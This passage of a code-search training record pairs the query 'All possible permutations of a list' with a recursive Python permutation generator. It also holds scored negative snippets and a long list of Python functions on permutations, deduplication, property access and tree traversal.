in key:\n top, rest = key.split('.', 1)\n #if DEBUG: print(top, rest)\n return self[top].deepget(rest)\n else:\n return self[key]", "def get_properties(self):\n return self.properties", "def get_cached_property_names(self): # real signature unknown; restored from __doc__\n return []", "def property( self, prop ):\n raise NotImplementedError(\"property\")", "def prop(self, statement):\n return MinCut.prop(self._root, statement)", "def abstractproperty(func):\n if sys.version_info > (3, 3):\n return property(abc.abstractmethod(func))\n return abc.abstractproperty(func)", "def __properties__(self) -> dict:\r\n parameters = [\r\n d for d in dir(self) if (d[0] != \"_\") and (d.count(\"set\") == 0)\r\n and (d.count(\"_c\") == 0) and (d.count(\"_f\") == 0)\r\n ]\r\n\r\n return self.__as_json__(parameters)", "def __iter__(self):\n if self.left is not None:\n yield from self.left\n yield self\n if self.right is not None:\n yield from self.right", "def get_property(self, property, data):\n\n values = data.xpath(\"%s//*[@%s='%s']\" % (self.scope, self.attribute, property))\n if len(values) == 0:\n values = data.xpath(\"//*[@%s='%s']\" % (self.attribute, property))\n return values", "def test_properties_evolution_get(self):\n pass", "def test_augassign_recursion():\n # infinitely recurses in python\n code = \"\"\"\n def rec():\n a = 0\n a += rec()\n return a\n rec()\n \"\"\"\n cls_node = extract_node(code)\n assert next(cls_node.infer()) is util.Uninferable", "def lazy_value(self):\n\n if self.state == Node.State.VALID:\n return self.value\n else:\n return None", "def propertyx(function):\n keys = ('fget', 'fset', 'fdel')\n func_locals = {'doc': function.__doc__}\n\n def probe_func(frame, event, arg):\n if event == 'return':\n locals = frame.f_locals\n func_locals.update(dict((k, locals.get(k)) for k in keys))\n sys.settrace(None)\n return probe_func\n\n sys.settrace(probe_func)\n function()\n return property(**func_locals)", "async def _materialize_walk_obj(d) -> Tree:\n if isinstance(d, ViewModel):\n # Resolve the first level of awaitables\n edge_set = set(d.__visited_edges__)\n edges = await resolve_parallel_dict(d, edge_set)\n # Resolve all edges recursively\n vals = await asyncio.gather(*(_materialize_walk_obj(v) for k, v in edges))\n for (k, _), val in zip(edges, vals):\n if k in edge_set:\n setattr(d, k, val)\n return d\n elif isinstance(d, dict):\n # Resolve the first level of awaitables\n items = await resolve_parallel_dict(d)\n vals = await asyncio.gather(*(_materialize_walk_obj(v) for k, v in items))\n for (k, _), val in zip(items, vals):\n d[k] = val\n return d\n elif isinstance(d, primitive) or d is None:\n return d\n elif isinstance(d, PaginatedEdge):\n d.edges = await resolve_parallel_iterable(d.edges)\n return d\n elif isinstance(d, Iterable):\n resolved = await resolve_parallel_iterable(d)\n return await asyncio.gather(\n *(val for val in (_materialize_walk_obj(v) for v in resolved) if val)\n )\n elif type(d) == types.AsyncGeneratorType:\n d_list = [i async for i in d] # TODO: Optimize\n resolved = await resolve_parallel_iterable(d_list)\n return await asyncio.gather(\n *(val for val in (_materialize_walk_obj(v) for v in resolved) if val)\n )\n elif isawaitable(d) or callable(d):\n # TODO: Profile and optimize recursive call\n resolved = await async_resolve_field(d)\n return await _materialize_walk_obj(resolved)\n raise Exception(\"Invalid type: \" + str(type(d)))", "def run(self):\n # Look through the properties.\n for name, value in \\\n 
self.context.get_properties(self.path).items():\n\n # If the name doesn't match, skip this one.\n if self.nameregex \\\n and not self.nameregex.match(name): continue\n\n # If the value doesn't match, skip this one.\n if self.valueregex \\\n and not self.valueregex.search(value): continue\n\n # Execute the child actions.\n self.context.tokens['PropName'] = name\n self.context.tokens['PropValue'] = value\n exitcode = super(FilterPropList, self).run()\n\n # If only looking for the first, or an error is reported,\n # bail out early.\n if self.matchfirst or exitcode != 0: return exitcode\n\n # Handle a non-error exit.\n return 0", "def get_properties(\n self, props=None, depth=0, parse_response_xml=True, parse_props=True\n ):\n rc = None\n response = self._query_properties(props, depth)\n if not parse_response_xml:\n return response\n\n if not parse_props:\n properties = response.find_objects_and_props()\n else:\n properties = response.expand_simple_props(props)\n\n error.assert_(properties)\n\n path = unquote(self.url.path)\n if path.endswith(\"/\"):\n exchange_path = path[:-1]\n else:\n exchange_path = path + \"/\"\n\n if path in properties:\n rc = properties[path]\n elif exchange_path in properties:\n if not isinstance(self, Principal):\n ## Some caldav servers reports the URL for the current\n ## principal to end with / when doing a propfind for\n ## current-user-principal - I believe that's a bug,\n ## the principal is not a collection and should not\n ## end with /. (example in rfc5397 does not end with /).\n ## ... but it gets worse ... when doing a propfind on the\n ## principal, the href returned may be without the slash.\n ## Such inconsistency is clearly a bug.\n log.error(\n \"potential path handling problem with ending slashes. Path given: %s, path found: %s. %s\"\n % (path, exchange_path, error.ERR_FRAGMENT)\n )\n error._assert(False)\n rc = properties[exchange_path]\n elif self.url in properties:\n rc = properties[self.url]\n elif \"/principal/\" in properties and path.endswith(\"/principal/\"):\n ## Workaround for a known iCloud bug.\n ## The properties key is expected to be the same as the path.\n ## path is on the format /123456/principal/ but properties key is /principal/\n ## tests apparently passed post bc589093a34f0ed0ef489ad5e9cba048750c9837 and 3ee4e42e2fa8f78b71e5ffd1ef322e4007df7a60, even without this workaround\n ## TODO: should probably be investigated more.\n ## (observed also by others, ref https://github.com/python-caldav/caldav/issues/168)\n rc = properties[\"/principal/\"]\n elif \"//\" in path and path.replace(\"//\", \"/\") in properties:\n ## ref https://github.com/python-caldav/caldav/issues/302\n ## though, it would be nice to find the root cause,\n ## self.url should not contain double slashes in the first place\n rc = properties[path.replace(\"//\", \"/\")]\n elif len(properties) == 1:\n ## Ref https://github.com/python-caldav/caldav/issues/191 ...\n ## let's be pragmatic and just accept whatever the server is\n ## throwing at us. But we'll log an error anyway.\n log.error(\n \"Possibly the server has a path handling problem, possibly the URL configured is wrong.\\n\"\n \"Path expected: %s, path found: %s %s.\\n\"\n \"Continuing, probably everything will be fine\"\n % (path, str(list(properties.keys())), error.ERR_FRAGMENT)\n )\n rc = list(properties.values())[0]\n else:\n log.error(\n \"Possibly the server has a path handling problem. 
Path expected: %s, paths found: %s %s\"\n % (path, str(list(properties.keys())), error.ERR_FRAGMENT)\n )\n error.assert_(False)\n\n if parse_props:\n self.props.update(rc)\n return rc", "def isprop(v):\n return isinstance(v, property)", "def traverse(self, recursive=False):\n out = []\n for i in range(len(self.keys)):\n if recursive == True and self.refs[i] != None:\n out.extend(self.refs[i].traverse(recursive=True))\n out.append[self.values[i]]\n if recursive == True:\n out.extend(self.refs[i+1].traverse(recursive=True))\n return out", "def walk(obj,dict_fn):\n if isinstance(obj,dict):\n result = dict()\n for key, value in obj.items():\n result[key] = walk(value, dict_fn)\n return dict_fn(result)\n if isinstance(obj,list):\n return [walk(i,dict_fn) for i in obj]\n return obj", "def memoized(fget):\n attr_name = \"_{0}\".format(fget.__name__)\n\n @wraps(fget)\n def fget_memoized(self):\n if not hasattr(self, attr_name):\n setattr(self, attr_name, fget(self))\n return getattr(self, attr_name)\n\n return property(fget_memoized)", "def enable_lazy():\r\n global USE_LAZY\r\n USE_LAZY = True", "def computed_some_property(config):\n return config.something + 10", "def run_properties(self, expanded, unexpanded) :\n\t\treturn self.manage_view_properties(expanded, unexpanded, \"/manage_propertiesForm\", perms = \"Manage properties\")", "def get_prop(self):\n\n if self.depth == 2:\n\n return \"\"\n\n return ri.RhinoInput(self.last).get_prop()", "def descendant_properties(self):\n response = check_defined(self, inspect.stack()[0][3])\n if not response:\n return response\n descendants = nx.descendants(self.se.property_only_graph,\n self.uri)\n result = restructure_output(self,\n descendants,\n inspect.stack()[0][3],\n self.output_type)\n return result" ]
[ "0.6558812", "0.62286186", "0.6222235", "0.6111081", "0.6004813", "0.5979281", "0.5608828", "0.5590664", "0.5550107", "0.5419193", "0.53930444", "0.5368933", "0.5345204", "0.53392524", "0.5152866", "0.5152002", "0.514644", "0.5144571", "0.51304764", "0.5085058", "0.50584644", "0.50355273", "0.5026561", "0.5001398", "0.49765545", "0.49714968", "0.4971482", "0.49477386", "0.49209678", "0.490763", "0.49023068", "0.48982802", "0.48976934", "0.48913345", "0.4885671", "0.48856318", "0.4885494", "0.48834714", "0.4882764", "0.4881576", "0.4874346", "0.48715752", "0.48701447", "0.48674327", "0.4861834", "0.48573688", "0.4844952", "0.4840363", "0.48317963", "0.48042354", "0.47923332", "0.47892702", "0.47866815", "0.478347", "0.477919", "0.47621185", "0.47593868", "0.47593868", "0.47593868", "0.47593868", "0.47593868", "0.47584453", "0.47549996", "0.4753754", "0.47429344", "0.47275168", "0.47251192", "0.4718781", "0.47182494", "0.47096625", "0.47081465", "0.4701575", "0.47010106", "0.47010106", "0.47010106", "0.47003993", "0.46998993", "0.46942866", "0.46929848", "0.46803796", "0.46797404", "0.46768996", "0.46720797", "0.46626878", "0.46619138", "0.46583843", "0.4655812", "0.4651831", "0.4647985", "0.46298546", "0.46284577", "0.46218485", "0.4619083", "0.46148524", "0.46133822", "0.4612502", "0.46103463", "0.4608182", "0.46080768", "0.4606708", "0.45809472" ]
0.0
-1
All possible permutations of a list
def all_perms(elements):
    if len(elements) <= 1:
        yield elements
    else:
        for perm in all_perms(elements[1:]):
            for i in range(len(elements)):
                # nb elements[0:1] works in both string and list contexts
                yield perm[:i] + elements[0:1] + perm[i:]
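A minimal usage sketch (illustrative, not part of the original dataset row), assuming the all_perms generator above; it enumerates the permutations lazily, so each result is printed as it is produced:

for perm in all_perms([1, 2, 3]):
    print(perm)
# yields the 6 permutations, in this order:
# [1, 2, 3], [2, 1, 3], [2, 3, 1], [1, 3, 2], [3, 1, 2], [3, 2, 1]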
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def permutations(lst):\n pass # Replace this with your implementation of the function.", "def permuta(L):\n return list(permuta_aux(L))", "def listDuplicate(self,permutations=True):\n ind,ok = self.testDuplicate(permutations)\n return ind[~ok]", "def unique():\r\n \r\n lista = main(8)\r\n nuevaLista = []\r\n while len(nuevaLista) < 12:\r\n\r\n for i in range(len(lista)):\r\n if lista[i] not in nuevaLista and not in_family(nuevaLista, lista[i]):\r\n nuevaLista.append(lista[i])\r\n \r\n return nuevaLista", "def full_permut_once_all(l):\n if len(l) == 1:\n return l\n else:\n perms = []\n for i in range(len(l)):\n cur = l[i]\n rest= l[:i] + l[i+1:]\n sub = full_permut_once_all(rest)\n # print('cur,rest,sub:',cur,rest,sub)\n cur_set = [[cur]+s for s in (sub if isinstance(sub[0],list) else [sub])]\n perms.append(cur_set)\n return perms", "def listUnique(self,permutations=True):\n ind,ok = self.testDuplicate(permutations)\n return ind[ok]", "def make_unique(lista):\n f = []\n for it in lista:\n if it not in f:\n f.append(it)\n return f", "def clean_repeat(rp):\n\treturn list(set(rp))", "def permutations(config):\r\n return list(set(itertools.permutations(config)))", "def _get_fresh_permutations(self):\n self.permutations = []\n for i in self.permutation_numbers:\n self.permutations.append(copy.copy(self.content.find(\"permutation\", number=i)))", "def copy(self,list):\r\n\t\tnew = []\r\n\t\ti = 0\r\n\t\twhile i<len(list):\r\n\t\t\tif (self.exist(new,list[i]) == False):\r\n\t\t\t\tnew.append(list[i])\r\n\t\t\ti=i+1\r\n\t\treturn new", "def sem_repetidos (l): # n = len(l), O(n^2)\n resultado = []\n for e in l: # n vezes\n if not e in resultado: # 1 + O(n)\n resultado.append(e) # O(1)\n return resultado", "def unique_permutations(items):\n return set(permutations(items))", "def permute(lst):\n tups = []\n tup = []\n if len(lst) > 1:\n tup = [(lst[i],lst[j]) for i in range(len(lst)) for j in range(i+1, len(lst))]\n tups.extend(tup)\n return tups", "def superposiciones(materias):\n\n combinaciones = []\n for materia in materias:\n\n nuevas = []\n for curso in materia['cursos']:\n\n for combinacion in combinaciones:\n if _cursos_compatibles(combinacion, curso):\n nuevas.append(combinacion + [curso])\n\n # cuando no hay combinaciones agregar el curso directamente\n if not combinaciones:\n nuevas.append([curso])\n\n combinaciones = nuevas\n\n return combinaciones", "def Deduplicate(items):\n seen = set()\n for it in items:\n if it not in seen:\n seen.add(it)\n yield it", "def permute(xs):\n return list(permutations(xs))", "def subsetsWithDup(self, nums: List[int]) -> List[List[int]]:\n nums.sort()\n n = len(nums)\n ans, res = [], []\n\n for i in range(2**n, 2**(n+1)):\n # generate bitmask, from 0..00 to 1..11\n bitmask = bin(i)[3:]\n res = [nums[j] for j in range(n) if bitmask[j] == '1']\n if res not in ans:\n ans.append(res)\n\n return ans\n # print(ans)", "def tri_si_rencontre(self, joueurs_tries, liste_rencontres, nb_joueurs):\n # We recover the possibilities\n for x in joueurs_tries:\n liste_dict = []\n for y in joueurs_tries:\n if x == y:\n continue\n if (x, y) in liste_rencontres or (y, x) in liste_rencontres:\n continue\n else:\n liste_dict.append(y)\n self.dict_possiblity[x] = liste_dict\n copy_joueurs = list(joueurs_tries)\n liste_finale = []\n nb_tour = 0\n error = False\n while joueurs_tries:\n x = joueurs_tries[0]\n for y in joueurs_tries:\n if nb_tour > nb_joueurs**2:\n print(\"Il y a une erreur dans l'algorithme.\")\n error = True\n break\n if x == y:\n continue\n if (x, y) in 
liste_rencontres or (y, x) in liste_rencontres:\n nb_tour += 1\n continue\n else:\n i = 0\n # we are looking for a unique possibility\n for key in list(self.dict_possiblity):\n if len(self.dict_possiblity[key]) == 1:\n valeur = self.dict_possiblity[key][0]\n liste_finale.append((key, valeur))\n liste_rencontres.append((key, valeur))\n joueurs_tries.remove(key)\n joueurs_tries.remove(valeur)\n self.sup_dicti(valeur, key)\n i += 1\n break\n if i > 0:\n break\n # we remove both of the possibilities\n self.sup_dicti(x, y)\n liste_finale.append((x, y))\n liste_rencontres.append((x, y))\n joueurs_tries.remove(y)\n joueurs_tries.remove(x)\n break\n if error:\n liste_finale = Vue().demander_binomes(copy_joueurs,\n nb_joueurs)\n return liste_finale\n return liste_finale", "def _deduplicate(lst):\n out = []\n for i in lst:\n if i not in out:\n out.append(i)\n return out", "def insercionListas(L1,L2):\n return set(L1) & set(L2)", "def removeDoublon(liste):\n tmp=[]\n for i,elt in enumerate(liste):\n if elt not in tmp:\n tmp.append(elt)\n return tmp", "def ordonare_cresc_dupa_pret(lst):\n\treturn sorted(lst, key=get_pret_achizitie)", "def mutant(self):\n _mutant = []\n _wt = self.wildtype\n for i in range(0, len(self.mutations)):\n site = _wt[i]\n options = self.mutations[i]\n if options is None:\n _mutant.append(_wt[i])\n else:\n for o in options:\n if o != site:\n _mutant.append(o)\n return \"\".join(_mutant)", "def elim_reps(lst):\n ans = []\n for x in lst:\n if x not in ans:\n ans.append(x)\n return ans", "def permutations(iterable):\n pass", "def uniq(listinput):\n\t\"\"\" This will be provided for the student. \"\"\"\n\toutput = []\n\tfor x in listinput:\n\t\tif x not in output:\n\t\t\toutput.append(x)\n\treturn output", "def permutations(digits, my_list):\r\n \r\n if len(my_list[0]) == len(digits) and len(my_list) > 0:\r\n return my_list\r\n else:\r\n new_list = []\r\n for item in my_list:\r\n for digit in digits:\r\n if digit not in item:\r\n new_item = item + digit\r\n new_list.append(new_item)\r\n return permutations(digits, new_list)", "def gen_permutations(outcomes, length):\r\n \r\n ans = set([()])\r\n for dummy_idx in range(length):\r\n temp = set()\r\n for seq in ans:\r\n for item in outcomes:\r\n new_seq = list(seq)\r\n if new_seq.count(item) == 0:\r\n new_seq.append(item)\r\n temp.add(tuple(new_seq))\r\n ans = temp\r\n return ans", "def delDoublon(values):\n\treturn list(set(values))", "def remove_duplicates(possible_vulns):\n return list(set(possible_vulns))", "def remove_duplicates_badSolution( li ):\n newli=[]\n seen = set()\n for item in li:\n if item not in seen:\n seen.add( item )\n newli.append(item)\n\n return newli", "def sprawdz(lista):\n # do_usuniecia - lista zawierajaca indeksy pol ktore zostana usuniete z glownej listy\n do_usuniecia = []\n # petla przechodzaca po wartosciach\n for i in range(len(lista) / 2):\n # j - indeks wartosci dla poszczgolnego panstwa\n j = 2 * i + 1\n # k - indeks pod ktorym nie ma wartosci\n k = 0\n # sprawdzanie ktore elementy sa bez wartosci oraz dodawanie ich do listy do usuniecia\n for el in lista[j]:\n if el is None:\n # zastosowanie unikalnosci indeksow\n if not k in do_usuniecia:\n do_usuniecia.append(k)\n\n k += 1\n # sortowanie listy z indeksami do usuniecia w sposob rosnacy\n do_usuniecia.sort()\n # nowalista - lista zawierajaca statystyki dostepne dla wszystkich panstw odpowiednio [Lata],[Wartosc]\n nowalista = []\n for i in range(len(lista)):\n # wartosc - lista zawierajaca poszczegolne dane z glownej listy\n wartosc = []\n # 
dodawanie wartosci, ktore sa dostepne dla wszystkich panstw do tabeli wartosc\n for j in range(len(lista[i])):\n # zastosowanie unikalnosci indeksow dla ktorych nie ma wartosci\n if not j in do_usuniecia:\n wartosc.append(lista[i][j])\n # dodawanie listy zawierajacej wynik dla poszczegolnych danych\n nowalista.append(wartosc)\n\n return nowalista", "def preencherJogadores():\n global jogadores\n for x in participantes:\n if x['porta'] != lider['porta']:\n jogadores.append(x)", "def unique(list1):\n \n # intilize a null list \n unique_list = [] \n \n # traverse for all elements \n for x in list1: \n # check if exists in unique_list or not \n if x not in unique_list: \n unique_list.append(x)\n return unique_list", "def mod_lista_oglindit(lista_1, lista_divizori):\n lista_finala = []\n for element in lista_1:\n if verifica_element_divide_lista(element, lista_divizori):\n oglindit = get_oglindit(element)\n lista_finala.append(oglindit)\n else:\n lista_finala.append(element)\n return lista_finala", "def listops_uniq(list_a):\r\n retlist = []\r\n for item in list_a:\r\n if item not in retlist:\r\n retlist.append(item)\r\n\r\n return retlist", "def modify(test_case):\r\n n=len(test_case)\r\n mod_test_cases=[]\r\n for i in range(n):\r\n mod_test_case=test_case[:]\r\n #print(mod_test_case[i])\r\n mod_test_case[i]= not mod_test_case[i]\r\n mod_test_cases.append((mod_test_case,i))\r\n return mod_test_cases", "def list_permutations(n,r, multiset=False):\n if not multiset:\n return list(itertools.permutations(n,r))\n\n elif multiset:\n return set(list(itertools.permutations(n,r)))", "def section_4_9():\n from itertools import permutations\n from itertools import combinations\n from itertools import combinations_with_replacement\n\n items = ['a', 'b', 'c']\n\n def test1():\n for p in permutations(items):\n print(p)\n\n def test2():\n for p in combinations(items, 3):\n print(p)\n print()\n for p in combinations(items, 2):\n print(p)\n print()\n for p in combinations(items, 1):\n print(p)\n print()\n for p in combinations_with_replacement(items, 3):\n print(p)", "def cambiar_Fichas(self,lista):\n self.rellenar_atril()\n for letra in lista:\n self.bolsa.agregar_bolsa(letra, 1)\n random.shuffle(self.bolsa.bolsa)", "def dedupe_list(input):\n return list(set(input))", "def AllPermutations(data):\n if len(data) <= 1:\n return data\n\n return [p for p in itertools.permutations(data)]", "def nextPermutation(self, nums: List[int]) -> None:\n pass", "def permutation(nums):\n list = []\n temp = []\n backtrack(list, temp, nums)\n return list", "def permute(seq, permutation):\n return [seq[i] for i in permutation]", "def carac_reproducciones(caracteristica, valor_min, valor_max, catalog):\n artistasNoRepetidos = lt.newList('ARRAY_LIST')\n artistasRepetidos = lt.newList('ARRAY_LIST')\n MapCaracteristicas = mp.get(catalog['caraContenido'], caracteristica)\n RBTcaracteristica = me.getValue(MapCaracteristicas)\n lista_listas_musica = om.values(RBTcaracteristica, valor_min, valor_max)\n lista_lista_musica = it.newIterator(lista_listas_musica)\n while it.hasNext(lista_lista_musica): \n lista_musica = it.next(lista_lista_musica)#lista_musica es un dicc de listas que tengo que recorrer \n musicas = it.newIterator(lista_musica)\n while it.hasNext(musicas):\n musica = it.next(musicas) #iterar sobre esta lista por artist_id\n if int(lt.isPresent(artistasNoRepetidos, (musica['artist_id']))) == 0:\n lt.addLast(artistasNoRepetidos, musica['artist_id'])\n if int(lt.isPresent(artistasRepetidos, (musica['created_at'] + 
musica['user_id'] + musica['track_id']))) == 0:\n lt.addLast(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))\n else:\n if int(lt.isPresent(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))) == 0:\n lt.addLast(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))\n return lt.size(artistasRepetidos), lt.size(artistasNoRepetidos)", "def ordenar_lista_menor_a_mayor_produccion(lista):\r\n largo_lista = len(lista)\r\n for i in range(largo_lista):\r\n for j in range(largo_lista-1):\r\n if lista[j+1] and lista[j][2] > lista[j+1][2]:\r\n auxiliar = lista[j+1]\r\n lista[j+1] = lista[j]\r\n lista[j] = auxiliar\r\n return lista", "def mutare_obiecte(old_loc, new_loc, lst):\n\texista_old_loc = False\n\tfor obiect in lst:\n\t\tif get_locatie(obiect) == old_loc:\n\t\t\texista_old_loc = True\n\t\t\tobiect[\"locatie\"] = new_loc\n\tif exista_old_loc is False:\n\t\traise ValueError(\"Locatia din care incercati sa mutati obiecte nu exista!\")\n\tif len(new_loc) != 4:\n\t\traise ValueError(\"Locatia noua trebuie sa aiba exact 4 caractere!\")\n\tif old_loc == new_loc:\n\t\traise RuntimeError(\"Locatia noua coincide cu cea curenta!\")\n\treturn lst", "def permutations(xs):\n if not xs:\n yield []\n else:\n for x, xs in selections(xs):\n for ys in permutations(xs):\n yield [x] + ys", "def objets_uniques(self):\n objets = []\n for membre in self.membres:\n for objet in membre.equipe:\n if objet.unique:\n objets.append(objet)\n objets.extend(objet.prototype.objets_contenus(objet))\n if membre.tenu and membre.tenu.unique:\n objet = membre.tenu\n objets.append(objet)\n objets.extend(objet.prototype.objets_contenus(objet))\n\n return objets", "def generarCombinaciones(self):\n combi = [list(x) for x in itertools.combinations(self.ResultConsultaLibre, 2)]\n self.CombiConsultaLibre=combi\n #print(self.CombiConsultaLibre)", "def _unique(li):\n return list(set(li))", "def update(self, list_of_sets):\n for s in list_of_sets:\n self.add(s)", "def lego_sets():\n # you must replace this line and return your own list\n return []", "def palindroame_multimi(lista_1, lista_2):\n lungime = lungime_multimi(lista_1, lista_2)\n lista_palindroame = []\n for i in range(0, lungime):\n element = str(lista_1[i]) + str(lista_2[i])\n if is_palindrome(element):\n lista_palindroame.append(int(element))\n return lista_palindroame", "def combinar(memoria):\n\n antLibre = False\n antEspacio = 0\n\n for part in memoria[:]:\n if antLibre and part[1] == None:\n part[0] += antEspacio\n del memoria[memoria.index(part) - 1]\n\n if part[1] == None:\n antLibre = True\n else:\n antLibre = False\n\n antEspacio = part[0]\n\n return memoria", "def apply_permutation(l, p):\n\n for i in xrange(len(l)):\n nxt = i\n print 'change - ', i\n while p[nxt] >= 0:\n print 'before-', i, p[nxt], l, p\n\n l[i], l[p[nxt]] = l[p[nxt]], l[i]\n temp = p[nxt]\n p[nxt] -= len(p)\n nxt = temp\n print 'after -', i, p[nxt], l, p\n\n\n print l", "def test_listes():\n listes = [Liste(mot) for mot in (\"SE\", \"PAS\", \"DE\", \"DEVIS\")]\n data_tycat(listes)\n _ = input()\n print(\"on ajoute listes[0] apres liste[1], puis un mot vide\")\n listes[1].suffixe(listes[0])\n listes[1].suffixe(Liste(\"\"))\n data_tycat(listes)\n _ = input()\n print(\"on ajoute listes[1] apres listes[2] et listes[0] apres listes[3]\")\n listes[2].suffixe(listes[1])\n listes[3].suffixe(listes[0])\n data_tycat(listes)\n _ = input()\n print(\"on efface 'DEVIS'\")\n del listes[3]\n data_tycat(listes)\n _ = 
input()\n # # test dans le cas où le doublage ne se fait pas à la tête de la liste\n # print(\"on efface 'DEPASSE'\")\n # del listes[2]\n # data_tycat(listes)\n # _ = input()\n print(\"on ajoute 'NT' apres 'PASSE'\")\n listes[1].suffixe(Liste(\"NT\"))\n data_tycat(listes)\n _ = input()\n print(\"on ajoute 'SE' apres elle-meme\")\n listes[0].suffixe(listes[0])\n data_tycat(listes)\n # # supression de SE\n # _ = input()\n # print(\"on efface 'SE'\")\n # del listes[0]\n # data_tycat(listes)", "def from_list():\n my_list = [1, 2, 3, 3, 3, 4]\n my_set = set(my_list)\n #new_list = [my_set] # [set([1, 2, 3, 4])]\n new_list = list(my_set) # [1, 2, 3, 4]\n print(new_list)", "def part_1():\n return itertools.permutations(range(5))", "def permute(l):\n perm = []\n if len(l) == 0:\n perm.append([])\n else:\n first_element = l[0]\n after_first = slice(1, None)\n sub_permutes = permute(l[after_first])\n for p in sub_permutes:\n for j in range(0, len(p) + 1):\n r = copy.deepcopy(p)\n r.insert(j, first_element)\n perm.append(r)\n return perm", "def add_sets(list_of_sets):\n global true_introns\n for item in list_of_sets:\n true_introns.update(item)", "def unique_contigs_are_unique(scaffold_list, unique_contigs_list):\n i= 0\n old_scaffold_list = copy.deepcopy(scaffold_list)\n old_scaffold_list = purge_redundancy(old_scaffold_list)\n new_scaffold_list = []\n while new_scaffold_list != old_scaffold_list and i < 20:\n \n i += 1\n if i != 1: \n old_scaffold_list = copy.deepcopy(new_scaffold_list)\n #new list is now old list\n new_scaffold_list = new_resolve_unique_contigs(old_scaffold_list, unique_contigs_list) \n new_scaffold_list = purge_redundancy(new_scaffold_list)\n\n return new_scaffold_list", "def test_multi_same(nothing_list):\n result = multi_same_list(nothing_list)\n assert result[1][2] == 0\n assert result[0][2] == 0", "def list_should_not_contain_duplicates(self,list_,msg=None):\r\n if not isinstance(list_,list):\r\n list_= list(list_)\r\n dupes = []\r\n for item in list_:\r\n if item not in dupes:\r\n count = list_.count(item)\r\n if count >1:\r\n logger.info(\" '%s' found %d times\" %(item,count))\r\n dupes.append(item)\r\n if dupes:\r\n raise AssertionError(msg or '%s found multiple times' %seq2str(dupes))", "def unique(input_list): \n try:\n # intilize a null list \n unique_list = [] \n # traverse for all elements \n for x in input_list: \n # check if exists in unique_list or not \n if x not in unique_list: \n unique_list.append(x)\n return(unique_list)\n except TypeError as detail:\n return (\"int object is not iterable\")", "def generos_existentes(catalog, generos):\n lista_repetidos_total = lt.newList('ARRAY_LIST')\n list_generos = generos.split(\",\")\n for genero in list_generos:\n artistasNoRepetidos = lt.newList('ARRAY_LIST')\n artistasRepetidos = lt.newList('ARRAY_LIST')\n MapGeneros = mp.get(catalog['musicaGenero'], genero)\n RBTgenero = me.getValue(MapGeneros)\n valor_min = om.minKey(RBTgenero)\n valor_max = om.maxKey(RBTgenero)\n lista_listas_musica = om.values(RBTgenero, valor_min, valor_max)\n lista_lista_musica = it.newIterator(lista_listas_musica)\n while it.hasNext(lista_lista_musica): \n lista_musica = it.next(lista_lista_musica)\n musicas = it.newIterator(lista_musica)\n while it.hasNext(musicas):\n musica = it.next(musicas)\n if int(lt.isPresent(artistasNoRepetidos, musica['artist_id'])) == 0:\n lt.addLast(artistasNoRepetidos, musica['artist_id'])\n if int(lt.isPresent(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))) == 0:\n 
lt.addLast(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))\n #if int(lt.isPresent(lista_repetidos_total, (musica['created_at'] + musica['user_id'] + musica['track_id']))) == 0:\n # lt.addLast(lista_repetidos_total, (musica['created_at'] + musica['user_id'] + musica['track_id']))\n else:\n if int(lt.isPresent(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))) == 0:\n lt.addLast(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))\n #if int(lt.isPresent(lista_repetidos_total, (musica['created_at'] + musica['user_id'] + musica['track_id']))) == 0:\n # lt.addLast(lista_repetidos_total, (musica['created_at'] + musica['user_id'] + musica['track_id']))\n \n print(str(genero) + ' is between ' + str(valor_min) + ' and ' + str(valor_max))\n print('Total of reproduction: ' + str(lt.size(artistasRepetidos)) + ' Total of unique artists: ' + str(lt.size(artistasNoRepetidos))) \n print('--------------- Some artists for ' + str(genero) + ' -----------')\n i = 0\n while i <= 9:\n print('Artist ' + str(i) + ': ' + lt.getElement(artistasNoRepetidos, i))\n i += 1\n print('Total of reproduction is ' + str(lt.size(lista_repetidos_total)))", "def copy_unique_elements(list_of_all):\n unique_list = []\n for i in list_of_all:\n if i not in unique_list:\n unique_list.append(i)\n if len(unique_list) == int(top_count):\n break\n return unique_list", "def gen_permutations_re(outcomes):\r\n\r\n if len(outcomes) == 1:\r\n ans = set()\r\n temp = []\r\n temp.append(outcomes[0])\r\n ans.add(tuple(temp))\r\n return ans\r\n\r\n rest_permutations = gen_permutations_re(outcomes[1:])\r\n\r\n answer = []\r\n for perm in rest_permutations:\r\n perm = list(perm)\r\n for i in range(len(perm) + 1):\r\n temp = perm[:]\r\n temp.insert(i, outcomes[0])\r\n answer.append(tuple(temp))\r\n\r\n return set(answer)", "def get_kritis(self, kriti_list):\n self.kritis = [[k.name, k.composer, k.link] for k in kriti_list if \n k.raga == self.name]", "def task7_unique_number(lst):\n unique = []\n for elem in lst:\n check_list = lst.copy()\n lst.remove(elem)\n if elem not in lst:\n unique.append(elem)\n lst = check_list\n return unique", "def location_list(lista: list):\n rezultat_final = []\n for element in lista:\n if get_locatie(element) not in rezultat_final:\n rezultat_final.append(get_locatie(element))\n return rezultat_final", "def ulist(M, pos,v):\n import copy\n list= copy.deepcopy(M)\n list[pos]=v\n return list", "def remove_duplicates(self,list_):\r\n ret =[]\r\n\r\n for item in list_:\r\n if item not in ret:\r\n ret.append(item)\r\n removed = len(list_)-len(ret)\r\n logger.info('%d duplicate%s removed.' 
